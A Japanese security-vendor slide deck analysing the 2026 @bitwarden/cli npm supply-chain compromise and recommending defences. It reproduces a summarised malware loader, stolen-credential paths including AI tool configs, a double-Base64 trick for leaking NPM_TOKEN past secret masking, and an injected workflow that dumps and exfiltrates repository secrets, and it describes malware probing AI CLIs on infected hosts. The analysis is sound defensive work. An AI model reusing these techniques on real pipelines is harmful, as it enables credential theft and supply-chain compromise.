Bitwarden ソフトウェアサプライチェーン攻撃詳細解説

by GMO Flatt Security

Embed

Start on current slide

Slide 1

Slide 1 text

Slide 2

Slide 2 text

米内貴志（よねうちたかし）仕事＆趣味: ものづくりを安全にすること 2019年〜 Flatt Security（'21〜 CTO）著書『Web ブラウザセキュリティ』等セキュリティ・キャンプ '12 参加, '18-'24 スタッフ等未踏ターゲット '21 / Quantum-Classical Programming Language ICC '23 アジア代表 / Head Captain CODE BLUE レビューボード '24-'25 自己紹介 © GMO Flatt Security Inc. All Rights Reserved. 2 / 50

Slide 3

Slide 3 text

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

起点は不変。Post-Exploitation の手法が事案ごとに変化中事案日付エコシステム起点（推定含む） Trivy Action 侵害 3/19 GitHub Actions メンテナ系トークン漏洩 LiteLLM 侵害 3/24 PyPI メンテナ系トークン漏洩（Trivy から連鎖） Telnyx 侵害 3/27 PyPI メンテナ系トークン漏洩（Trivy から連鎖） axios 侵害 3/31 npm メンテナ系トークン漏洩（端末経由の S.E.） @bitwarden/cli 侵害 4/23 npm メンテナ系トークン漏洩起点としては、いずれもメンテナや CI が抱えるトークンが攻撃者の手に渡ったという同じ構造ただしトークンを得た後の手法は事案ごとに進化している。Bitwarden 事案はその現在地点 2026 年 3 月以降のソフトウェアサプライチェーン侵害 © GMO Flatt Security Inc. All Rights Reserved. 5 / 50

Slide 6

Slide 6 text

トークンを得た後の手法が、3 つの軸で変化している進化軸 ①: Trusted Publishing 有効下での悪性版を publish 進化軸 ②: 並行発生した GitHub Actions Secrets 窃取攻撃進化軸 ③: AI 製品への関心の高まり本日はこの 3 点を、第 2 部 / 第 3 部 / 第 4 部でそれぞれ深掘りする Bitwarden 事案で進化した 3 つのテクニック © GMO Flatt Security Inc. All Rights Reserved. 6 / 50

Slide 7

Slide 7 text

@bitwarden/cli 侵害の概要タイムライン、悪性パッケージ構成、ペイロード挙動、窃取対象 Trusted Publishing 下での侵害 OIDC 経路を通したまま publish に成功した経緯 GitHub Action Secrets の窃取技法とその変化並行進行した Actions Secrets 窃取と、その射程攻撃者の AI 製品への関心 AI ツール config の標的化と、関連する別キャンペーンの観測今後検討すべき対策推移的依存の現実、構造的な再発要因、防御プレイブック 01 02 03 04 05 今日話すこと © GMO Flatt Security Inc. All Rights Reserved. 7 / 50

Slide 8

Slide 8 text

Slide 9

Slide 9 text

@bitwarden/[email protected] を介して Infostealer が配布された事案指標内容悪性バージョン @bitwarden/[email protected] 安全なバージョン 2026.3.0 以前 / 2026.4.1 以降公開時刻 2026/4/23 06:22:59 JST（npm registry _time 由来）テイクダウン時刻 4/23 08:30 JST 頃（Bitwarden 公式声明に基づく）ペイロード Bun 経由で実行される難読化 JS Infostealer 影響範囲主に端末・CI/CD 上のローカルクレデンシャル Bitwarden社のサーバや Vault 本体への侵害は現時点で報告なし（ほっ…） Bitwarden 侵害（4/23）: 概要 © GMO Flatt Security Inc. All Rights Reserved. 9 / 50

Slide 10

Slide 10 text

パッケージの侵害と Secrets の窃取が並行して進行していた 4/23 06:22 悪性 publish @bitwarden/cli 2026.4.0 公開 (OIDC 経由) 4/23 06:57 workflow 注入 bitwarden/clients に secrets 窃取 workflow 投入(1 回目失敗) 4/23 08:30 テイクダウン Bitwarden が 2026.4.0 を取り下げ (公式声明) 4/23 08:40 Secrets 窃取 vgrassia トークンで workflow 発火 artifact upload 完了 4/24 00:54 復旧 2026.4.1 公開 (provenance 付き) 4/23 06:22 npm publish が Trusted Publishing 有効下で成立 4/23 06:57 には、npm 侵害とは別経路で bitwarden/clients への攻撃が確認されているたった数時間の間に、publish 経路と Actions Secrets 経路の 2 系統が同日中に侵害された事案といえる Bitwarden 侵害（4/23）: タイムライン © GMO Flatt Security Inc. All Rights Reserved. 10 / 50

Slide 11

Slide 11 text

差分はわずか 4 点。正規ビルド成果物の上にインジェクションを重ねた構成項目正規 2026.3.0 悪性 2026.4.0 package.json の version 2026.3.0 2026.4.0 package.json の scripts.preinstall （なし） node bw_setup.js （追加） bw_setup.js なしあり（新規注入） bw1.js なしあり（新規注入） bin エントリポイント正規のビルド済 CLI 悪性 bw_setup.js に差し替え既存の正規ビルド成果物の上に package.json + 2 ファイル + bin 差し替えだけを乗せた構成他の TeamPCP キャンペーンでも共通して、基本あまり既存ファイルの差し替えは最小である悪性 2026.4.0 の構成 © GMO Flatt Security Inc. All Rights Reserved. 11 / 50

Slide 12

Slide 12 text

npm install でも、インストール後の bw 起動でも、いずれにせよ bw_setup.js が走る # パターン 1: install 時に preinstall フックが発火 $ npm install @bitwarden/cli # → package.json の "preinstall": "node bw_setup.js" が自動実行 # パターン 2: --ignore-scripts でも、bw 起動時に bin エントリが発火 $ npm install @bitwarden/cli --ignore-scripts $ bw login # → "bin": { "bw": "bw_setup.js" } が起動直接依存だけでなく、間接依存で @bitwarden/cli を取り込んだプロジェクトでも preinstall は発火する悪性 2026.4.0 の構成 - 発火点は２つ © GMO Flatt Security Inc. All Rights Reserved. 12 / 50

Slide 13

Slide 13 text

Stage 1 (bw_setup.js ) は Bun を取得するだけのローダー。本体は Stage 2 の bw1.js // bw_setup.js （要約） try { execFileSync("bun", ["--version"], { stdio: "ignore" }); return; } catch {} const url = `https://github.com/oven-sh/bun/releases/download/bun-v${BUN_VERSION}/${assetName}`; const zipBuf = await get(url); // ... unzip ... execFileSync(binPath, ["bw1.js"], { stdio: "inherit" }); Stage 1 ( bw_setup.js ) はわずか 4 KB の純粋なローダーダウンロード元 github.com/oven-sh/bun/releases/... は正規インフラマルウェア以外にも Bun をダウンロードするパッケージは一定数存在するこういう Stager はブロックもしにくいですね…… Stage 2 ( bw1.js ) は難読化された JavaScript（後述） Stage 1〜2: Bun のダウンロード + 悪性JSの起動 © GMO Flatt Security Inc. All Rights Reserved. 13 / 50

Slide 14

Slide 14 text

クラウド系を狙いつつ（過去の TeamPCP 事案同様）、新たにAI ツールの設定ファイルも標的化種別対象 SSH ~/.ssh/id_rsa , id_ed25519 , id_ecdsa , id_dsa , known_hosts , authorized_keys Git ~/.gitconfig , ~/.git-credentials シェル履歴 ~/.bash_history , ~/.zsh_history , ~/.sh_history npm ~/.npmrc , プロジェクト直下 .npmrc , npm_[A-Za-z0-9]{36,} 環境変数 GitHub gh auth token 実行 / ghp_* / gho_* 走査 AWS / GCP ~/.aws/credentials , ~/.aws/config , ~/.config/gcloud/credentials.db .env プロジェクト直下のシークレット AI ツール（新規） ~/.claude.json 、 ~/.kiro/settings/mcp.json 、Cursor MCP 設定、 codex / aider 関連 Stage 2: 具体的な窃取内容 © GMO Flatt Security Inc. All Rights Reserved. 14 / 50

Slide 15

Slide 15 text

C2 ドメインは他の侵害キャンペーンとも共有されている JSON → gzip → AES-256-GCM (32-byte key / 12-byte IV 、毎回ランダム) → RSA-OAEP-SHA256 で AES 鍵を公開鍵でラップ → HTTPS POST → hxxps://audit[.]checkmarx[.]cx/v1/telemetry 本物は checkmarx[.]com で、Checkmarx 社ドメインに対する Typosquatting ドメインいかにも安全なトラフィックと見せかけるための小細工 TeamPCP 系事案では共通して、このような OpSec（というか小細工）が見られる同ドメイン名は 3 月の Checkmarx 系侵害でも C2 として観測されている特に KICS 系侵害で用いられていた C2インフラは共通と思料 Stage 3: プライマリ C2 への持ち出し © GMO Flatt Security Inc. All Rights Reserved. 15 / 50

Slide 16

Slide 16 text

GitHub という正規インフラ上に 3 系統の代替経路が存在。ブロックが難しい構成系統仕組みコミットメッセージ埋め込み PAT 正規表現 ^LongLiveTheResistanceAgainstMachines:([A-Za-z0-9+/]{1,100}={0,3})$ にマッチするコミットを GitHub 全体から検索、Base64 を二重デコードして攻撃者 PAT を取り出すドメインローテーションマーカー beautifulcastle プレフィックスに RSA 署名付きデータが続くコミットメッセージを検索署名検証後代替 C2 ドメインとして利用被害者リポジトリへの直接 push 窃取トークンで被害者アカウント上に {dune_word}-{dune_word}-{3 桁} 命名のリポジトリを作成そこに暗号化済データを push し、外部から取得可能にいずれも api.github.com への通信であり、ドメインブロック単体では止められない構成ペイロード本体を更新せずとも、攻撃者は GitHub 上にメッセージを置くだけで C2 を切り替えられる構成 Stage 4: GitHub フォールバック C2（3 系統） © GMO Flatt Security Inc. All Rights Reserved. 16 / 50

Slide 17

Slide 17 text

Slide 18

Slide 18 text

Slide 19

Slide 19 text

Slide 20

Slide 20 text

$ curl -s 'https://registry.npmjs.org/@bitwarden/cli' \ | jq '.versions["2026.4.0"]._npmUser' { "name": "GitHub Actions", "email": "[email protected]", "trustedPublisher": { "id": "github", "oidcConfigId": "oidc:8764ccf5-7f27-402d-bc11-59317b5995b1" } } この oidcConfigId は正規 2026.3.0 および復旧版 2026.4.1 と完全に同一 npm から見れば Bitwarden が長期トークンを持たずにパッケージを publish したように見えるにもかかわらず、tarball の中身は明確に悪性であった ▼ 正規 publish パイプラインの侵害の上、悪性版がリリースされた今回は Trusted Publishing 経由で悪性版が公開された © GMO Flatt Security Inc. All Rights Reserved. 20 / 50

Slide 21

Slide 21 text

SHA (短縮) author 名 committer.date (JST) メッセージ verified 47c6f590 Isaiah Inuwa 4/23 02:38:24 Update action false (unsigned) ea44eef9 Isaiah Inuwa 4/23 02:38:24 Update action false (unsigned) ed1164f7 Isaiah Inuwa 4/23 06:07:24 Reapply false (unsigned) d5b8f8c0 Isaiah Inuwa 4/23 06:14:02 Reapply false (unsigned) 03df1ecd Isaiah Inuwa 4/23 06:18:53 Reapply false (unsigned) 全 5 コミットの author が Bitwarden 社員 Isaiah Inuwa に偽装 @bitwarden/[email protected] の publish は 4/23 06:22:59 JST = 03df1ecd の 4 分後（直後） Publish パイプライン側の侵害は bitwarden/clients の 5 連鎖コミットからなる © GMO Flatt Security Inc. All Rights Reserved. 21 / 50

Slide 22

Slide 22 text

Slide 23

Slide 23 text

Slide 24

Slide 24 text

Slide 25

Slide 25 text

Slide 26

Slide 26 text

echo $NPM_TOKEN | base64 -w 0 | base64 -w 0 を仕込み、GHA の secrets マスク（元文字列とのバイト一致でしかマスクしない）をすり抜けて平文でログに吐かせ、後から回収する 5 つ目: 03df1ec — NPM_TOKEN を Base64 二重エンコードでログ漏洩 © GMO Flatt Security Inc. All Rights Reserved. 26 / 50

Slide 27

Slide 27 text

Trusted Publishing は長期トークン漏洩を防ぐが、ビルドパイプライン侵害には依然脆い事案 publish に使われたトークン攻撃者が握ったルート axios (3/31) 個人アカウントの長期 NPM_TOKEN メンテナ端末侵害 → 長期トークン窃取 Bitwarden (4/23) Trusted Publishing の短期 OIDC / NPM_TOKEN publish workflow 改変 → 実行時にトークンを leak どちらも最終的には「publish 権限のあるトークンを攻撃者が取得した」という同じ結末 Trusted Publishing が変えたのは「攻撃の必要条件」に留まる長期トークン窃取ではなく、GHA / publish パイプラインの改変権限を奪わねばならない NPM_TOKEN ではなく GITHUB_TOKEN や ACTIONS_ID_TOKEN_REQUEST_TOKEN を奪う必要がある逆に publish workflow を書き換えられる立場を取られた瞬間、Trusted Publishing 単独では止まらないまとめ: Trusted Publishing もビルドパイプライン侵害には脆い © GMO Flatt Security Inc. All Rights Reserved. 27 / 50

Slide 28

Slide 28 text

Slide 29

Slide 29 text

publish 系経路と無関係に、bitwarden/clients 上で別の侵害が進んでいたフィールド値 Workflow run ID 24808363037 Actor / triggering_actor vgrassia （Bitwarden 社員、2011 年作成の既存アカウント） Event push Head branch irlvzwiosm Head SHA 0593c5ec... (author aDrupont4191 、現在 GitHub 上で 404) Created at 2026/4/23 08:40:37 JST Conclusion success Artifact files (1,762 bytes、未 expire、 08:40:43 JST upload) 並行進行: irlvzwiosm ブランチでの GHA Secrets 窃取 © GMO Flatt Security Inc. All Rights Reserved. 29 / 50

Slide 30

Slide 30 text

name: irlvzwiosm on: { push: { branches: irlvzwiosm } } jobs: testing: runs-on: ubuntu-latest steps: - env: { VALUES: "${{ toJSON(secrets) }}" } # repo secrets を JSON 化 run: cat < output.json\n$VALUES\nEOF - env: { PUBKEY: '-----BEGIN PUBLIC KEY----- ... -----END PUBLIC KEY-----' } run: | aes_key=$(openssl rand -hex 12) openssl enc -aes-256-cbc -in output.json -out out.enc -pass pass:$aes_key echo $aes_key | openssl rsautl -encrypt -pubin -inkey <(echo "$PUBKEY") > lookup.txt - uses: actions/upload-artifact@v4 with: { name: files, path: [out.enc, lookup.txt] } 注入された workflow の中身 © GMO Flatt Security Inc. All Rights Reserved. 30 / 50

Slide 31

Slide 31 text

Slide 32

Slide 32 text

bitwarden/clients の実 workflow から、dump され得た secrets を逆引きする観測対象参照場所 irlvzwiosm から見えるか AZURE_CLIENT_ID / TENANT_ID / SUBSCRIPTION_ID publish / build / deploy 系で top-level 参照 ◯ (repo or org secret) GITHUB_TOKEN 全 workflow ◯ (自動生成、当該 repo scope、run 終了で expire) Environment secrets ( CLI - NPM 内 NPM_TOKEN 等) environment: 宣言下の job のみ ✕ (irlvzwiosm は environment 未指定) Key Vault 配下の credentials (NPM publish / code-signing / AWS S3 等) get-keyvault-secrets@main で動的取得 ✕ (実体は Azure Key Vault) ▼ 重要 credentials は Azure Key Vault に隔離されており、dump 範囲は限定的とみられるどの secrets が抜かれた可能性があるのか © GMO Flatt Security Inc. All Rights Reserved. 32 / 50

Slide 33

Slide 33 text

Slide 34

Slide 34 text

AI ツール系の認証情報リークが狙われている点が特徴的範囲典型的に含まれるもの攻撃可用性 ~/.claude.json セッション ID、ワークスペース ID 直接の API キーではないが… MCP 設定 MCP サーバの URL + Bearer / API キー多くは平文記載！環境変数平文 API キー直接 LLM API 呼び出し直接の平文 API キーとは限らないが、OAuth / Bearer / セッション ID も実質的に同等の攻撃可用性 MCP 設定は複数 SaaS の Bearer トークンが集約される構成になりがち AI ツール config の標的化: 何が実際に書かれているか © GMO Flatt Security Inc. All Rights Reserved. 34 / 50

Slide 35

Slide 35 text

攻撃者にとって LLM インフラへのアクセスにも一定の価値があるものと思料窃取された LLM API キーはダークマーケットでの転売対象となり、即時の換金経路がある MCP 設定には Slack / GitHub / Notion 等の Bearer が集約しがちで、1 ファイルで複数 SaaS への侵害ルートを確保できる侵害ホストを LLM リレーノード化する別キャンペーンも観測されている（後続スライドで詳述）なぜ攻撃者は AI ツール周辺に関心を持つのか © GMO Flatt Security Inc. All Rights Reserved. 35 / 50

Slide 36

Slide 36 text

bw1.js 内には、被害者端末上の AI CLI をプルーブするコードが含まれている列挙対象: Claude Code / Gemini CLI / Codex CLI / Kiro CLI / Aider / OpenCode の 6 種類各 CLI に投げるプロンプトは以下 Hey! Just making sure you're here. If you are can you respond with 'Hello' and nothing else? このコード単体では、AI に何かを指示して悪事を働かせる挙動は無い。AI CLI が動くかどうかを確認しているだけただし、 nx s1ngularity 攻撃のように侵害端末上の AI CLI を偵察・横展開に使う流れは既に観測されている ▼ 「侵害端末で AI CLI が利用可能か」を計測している？別の関心: 侵害先端末の AI CLI の悪用？ © GMO Flatt Security Inc. All Rights Reserved. 36 / 50

Slide 37

Slide 37 text

侵害パッケージで被害者ホストを LLM リレーノード化する攻撃も観測されている Aikido が kube-health-tools (npm) / kube-node-health (PyPI) を解析した結果として観測されている事案ネイティブバイナリのドロッパーが Stage 2 RAT を取得し、被害者ホスト上に OpenAI 互換 API ゲートウェイをデプロイする C2 ドメイン sync.geeker.indevs.in がリバーストンネル経由で SSH / SFTP / SOCKS5 等の複数ポートを制御している動機面では、中国系の脅威アクターが地理的制限を回避するために LLM API リレーを商品として提供している事情がある侵害ホスト経由で AI ツールを利用すると、コンテキストウィンドウごと攻撃者に渡る位置を取られる出典: Aikido — GPT-proxy backdoor in npm and PyPI ▼ AI ツール周辺は、認証情報の窃取とインフラの再利用、両方の経路で標的になっている別キャンペーン: GPT-proxy backdoor in npm/PyPI © GMO Flatt Security Inc. All Rights Reserved. 37 / 50

Slide 38

Slide 38 text

Slide 39

Slide 39 text

3 つの理由がある。いずれも一般化可能で、次の事案でも当てはまる理由 1: 推移的依存直接依存に書いていなくても、依存先が @bitwarden/cli を引いていれば preinstall は発火するただし CLI ツールゆえ被依存は少なく、今回単体での射程は限定的同手口がライブラリ系の高被依存パッケージに転用されれば推移的影響は広範になる理由 2: 攻撃パターンは再利用可能今回の Trusted Publishing 悪用、artifact 経由 Secrets ダンプ、AI config 窃取はどれも他パッケージに転用可能理由 3: AI 駆動開発の進行 AI に依存追加を任せている時代、何が install されているか把握できていない加えて、その AI ツール自身の設定が今回の窃取対象に含まれている（自己強化的なリスク）なぜ「(Bitwarden CLI を) 不使用だから OK」ではないのか © GMO Flatt Security Inc. All Rights Reserved. 39 / 50

Slide 40

Slide 40 text

利用者側の防御は 4 本柱に整理できる。1 つだけでは不十分で、組み合わせて初めて効く柱内容代表的な手法 (1) 受け入れ評価何を入れるかを厳しく評価する Dependency Cooldown、レジストリプロキシ、provenance 検証 (2) 依存固定 mutable な参照を潰す SHA pinning、lockfile、 npm ci (3) アーキテクチャ堅牢化侵害されても連鎖しない構造にするビルド/デプロイ分離、本番権限の最小化 (4) エンドポイント統制 CI/CD も端末と同じように守る eBPF トレース、ネットワーク可視化、メモリダンプ検知対策: 4 本柱 © GMO Flatt Security Inc. All Rights Reserved. 40 / 50

Slide 41

Slide 41 text

「公開直後に飛びつかない」を仕組みにする。今回の Bitwarden 事案にも有効だった # npm v11+ / .npmrc min-release-age=7 # uv (Python) uv add --exclude-newer "3 days" # GitHub Actions (pinact) pinact run --min-age 3 悪性 2026.4.0 は約 93 分でテイクダウンされた（Bitwarden 公式声明） 3 日（最小）/ 7 日（推奨）の検疫期間を入れていた環境は、今回の検体に到達しなかった注意: 数日待てば全て安全になるわけではない。長期間潜伏する検体も普通にある dropper 型は検疫期間中は無害で、通過後に C2 から本体を落とすこともできる (1) 受け入れ評価: Dependency Cooldown © GMO Flatt Security Inc. All Rights Reserved. 41 / 50

Slide 42

Slide 42 text

pnpm v10+ は publish 経路の信頼度が下がるバージョンをブロックできる。ただし今回は効かない事案 publish 経路の変化 no-downgrade で防げるか axios 侵害 (3/31) OIDC → 手動 publish に切替防げる（実際にこの設定を入れていた環境はブロック済） Bitwarden 侵害 (4/23) OIDC を維持したまま中身が悪性防げない（信頼度のダウングレードがないため検出不能）侵害経路によって、効く防御・効かない防御が変わるこれは「 trustPolicy を入れたから安心」ではなく、多層防御を組む必要があることを示している (1) 受け入れ評価: 信頼性ダウングレードの拒否 © GMO Flatt Security Inc. All Rights Reserved. 42 / 50

Slide 43

Slide 43 text

npm config set registry https://npm.flatt.tech/ pip config set global.index-url https://pypi.flatt.tech/simple/ 1 コマンドで導入できる。無料で利用できる弊社のリサーチチームが運用する脅威インテリジェンス基盤でブロックリストを構築パッケージ公開を（ニア）リアルタイムで捕捉、静的解析・サンドボックス実行・HITL 判定を組み合わせメール登録で事後通知: ダウンロード後に悪性と判明した場合に通知を受け取れる (1) 受け入れ評価: Takumi Guard © GMO Flatt Security Inc. All Rights Reserved. 43 / 50

Slide 44

Slide 44 text

評価したものだけを再生し、それ以外は引き込まない # GitHub Actions: SHA pinning （mutable タグを使わない） uses: actions/[email protected] # v4.2.2 # npm: lockfile から再現性を担保 npm ci --ignore-scripts # pip: ハッシュ検証付きインストール pip install --require-hashes -r requirements.txt npm ci --ignore-scripts が CI/CD では標準。 preinstall 系攻撃の発火点を 1 つ潰す注意: 今回の事案は ^1.x のような version range とは独立して、latest 範囲内の悪性混入だった lockfile の更新タイミングで引き込まれうる → Cooldown と組み合わせて初めて防げる (2) 依存固定: lockfile + SHA pinning © GMO Flatt Security Inc. All Rights Reserved. 44 / 50

Slide 45

Slide 45 text

危険度: 高ビルド外部スクリプトがガンガン動く場所 → 境界アーティファクトここだけが両者の接点 ← 本番権限ありデプロイ参照して設置するだけ任意コード実行はしないビルドは外部依存のコードがガンガン動く場所。ここに本番の鍵を置かないデプロイは本番への強い権限を持つので、ビルドと同居させないアーティファクトだけが両者の接点になるような設計を意識する (3) アーキテクチャ堅牢化: ビルドとデプロイの分離 © GMO Flatt Security Inc. All Rights Reserved. 45 / 50

Slide 46

Slide 46 text

CI/CD はエンドポイントの一種。端末を守るのと同等のテレメトリを取る開発端末: EDR 等のエンドポイント監視は一定整備されつつあるプロダクト環境: GuardDuty 等のマネージド監視も普及してきた CI/CD 環境: ここはまだ間隙。マネージド GitHub Actions では特にログ・テレメトリが薄い Trivy・LiteLLM・axios・Bitwarden、いずれも CI/CD ランナー上で発火そして検知が後手に回り、事後の影響範囲特定すら困難になる ▼ CI/CD 環境のログ・テレメトリ確保は 2026 年の重要テーマ (4) エンドポイント統制: CI/CD 環境の記録 © GMO Flatt Security Inc. All Rights Reserved. 46 / 50

Slide 47

Slide 47 text

GitHub Actions の Runner として動作するジョブごとに専用のエフェメラル VM を起動独立したカーネル・ファイルシステム・ネットワークスタックコンテナ型と違い分離が強い eBPF でシステムコールレベルのトレース process_exec / net_connect / file_open どのプロセスがどこに通信したか / 何を読み書きしたかが全て見える取得トレースは DuckDB クエリで分析可能既知 IoC ベースの遡及検索ができる有事のインシデントレスポンスに直結 Takumi Runner: eBPF トレーシング付き Runner © GMO Flatt Security Inc. All Rights Reserved. 47 / 50

Slide 48

Slide 48 text

Slide 49

Slide 49 text

明日は我が身と考え、ソフトウェアサプライチェーン攻撃に備えましょう！第 1 部 @bitwarden/cli 侵害の概要 @bitwarden/[email protected] 経由で配布された情報窃取ペイロードが、端末ローカル資格情報を広く窃取第 2 部 Trusted Publishing 下での侵害技法 publish パイプライン ( bitwarden/clients ) が侵害されれば、Trusted Publishing でも publish トークンは抜き取られる第 3 部 Action Secrets の窃取技法とその変化同日中に GHA Secrets も並行して窃取された。Bitwarden 側は重要 credentials を Azure Key Vault に隔離する運用第 4 部攻撃者の AI 製品への関心 AI ツール config と LLM インフラそのものが標的化されている第 5 部「不使用だから OK」ではない・対策 Consumer 側の防御は受け入れ評価・依存固定・アーキテクチャ堅牢化・CI/CD エンドポイント統制の 4 本柱本日のまとめ © GMO Flatt Security Inc. All Rights Reserved. 49 / 50

Slide 50

Slide 50 text

No content